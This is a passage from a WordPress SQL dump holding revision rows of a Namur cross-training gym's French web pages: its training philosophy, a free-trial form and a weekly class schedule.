besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:17:07', '2013-07-04 19:17:07', '', 5, 'http://www.crosstrainingcenter.be/5-revision-54/', 0, 'revision', '', 0),
(309, 1, '2013-07-04 19:17:25', '2013-07-04 19:17:25', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 300px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 310px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:17:25', '2013-07-04 19:17:25', '', 5, 'http://www.crosstrainingcenter.be/5-revision-55/', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(310, 1, '2013-07-04 19:17:38', '2013-07-04 19:17:38', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 300px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:17:38', '2013-07-04 19:17:38', '', 5, 'http://www.crosstrainingcenter.be/5-revision-56/', 0, 'revision', '', 0),
(311, 1, '2013-07-04 19:17:51', '2013-07-04 19:17:51', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:17:51', '2013-07-04 19:17:51', '', 5, 'http://www.crosstrainingcenter.be/5-revision-57/', 0, 'revision', '', 0),
(312, 1, '2013-07-04 19:21:55', '2013-07-04 19:21:55', '<blockquote>\r\n<h2>Bien plus qu\'une simple activité physique, le cross training center de Namur vous propose une approche unique faisant intervenir l\'alimentation et la gestion du stress tout en vous proposant un entraînement de qualité.</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:21:55', '2013-07-04 19:21:55', '', 5, 'http://www.crosstrainingcenter.be/5-revision-58/', 0, 'revision', '', 0),
(313, 1, '2013-07-04 19:24:32', '2013-07-04 19:24:32', '<blockquote>\r\n<h2>Bien plus qu\'une simple activité physique, le cross training center de Namur vous propose une approche unique faisant intervenir l\'alimentation et la gestion du stress tout en vous proposant un entraînement de qualité.</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:24:32', '2013-07-04 19:24:32', '', 5, 'http://www.crosstrainingcenter.be/5-revision-59/', 0, 'revision', '', 0),
(450, 1, '2013-11-04 16:47:48', '2013-11-04 16:47:48', '<blockquote>\r\n<h2>Bien plus qu\'une simple activité physique, le cross training center vous propose une approche unique faisant intervenir l\'alimentation et la gestion du stress, tout en vous proposant un entraînement de qualité.</h2>\r\n&nbsp;</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-11-04 16:47:48', '2013-11-04 16:47:48', '', 5, 'http://www2.crosstrainingcenter.be/5-revision-v1/', 0, 'revision', '', 0),
(314, 1, '2013-07-04 19:25:05', '2013-07-04 19:25:05', '<blockquote>\r\n<h2>Bien plus qu\'une simple activité physique, le cross training center de Namur vous propose une approche unique faisant intervenir l\'alimentation et la gestion du stress, tout en vous proposant un entraînement de qualité.</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:25:05', '2013-07-04 19:25:05', '', 5, 'http://www.crosstrainingcenter.be/5-revision-60/', 0, 'revision', '', 0),
(315, 1, '2013-07-03 20:48:33', '2013-07-03 20:48:33', '<h1>Une séance gratuite?</h1>\r\nEnvie de découvrir les bienfaits du cross training?\r\nNous vous offrons gratuitement une première séance.\r\nRemplissez le formulaire ci-dessous et nous vous recontacterons pour planifier, avec vous, votre première séance. \r\n\r\n[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]', 'Séance gratuite', '', 'inherit', 'open', 'open', '', '266-revision-5', '', '', '2013-07-03 20:48:33', '2013-07-03 20:48:33', '', 266, 'http://www.crosstrainingcenter.be/266-revision-5/', 0, 'revision', '', 0),
(316, 1, '2013-07-04 19:33:16', '2013-07-04 19:33:16', '<blockquote>\r\n<h1>Envie de vous essayer au cross training?</h1>\r\n</blockquote>\r\nVenez nous rencontrer afin de découvrir le déroulement d\'une séance de cross training.\r\n\r\nLaissez-nous vos coordonnées et nous vous recontacterons afin de planifier avec vous votre première séance gratuite.\r\n<h1>[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]</h1>', 'Séance gratuite', '', 'inherit', 'open', 'open', '', '266-revision-6', '', '', '2013-07-04 19:33:16', '2013-07-04 19:33:16', '', 266, 'http://www.crosstrainingcenter.be/266-revision-6/', 0, 'revision', '', 0),
(319, 1, '2013-07-04 19:38:42', '2013-07-04 19:38:42', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Chaque séance est composée de 4 phases décrite dans le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et 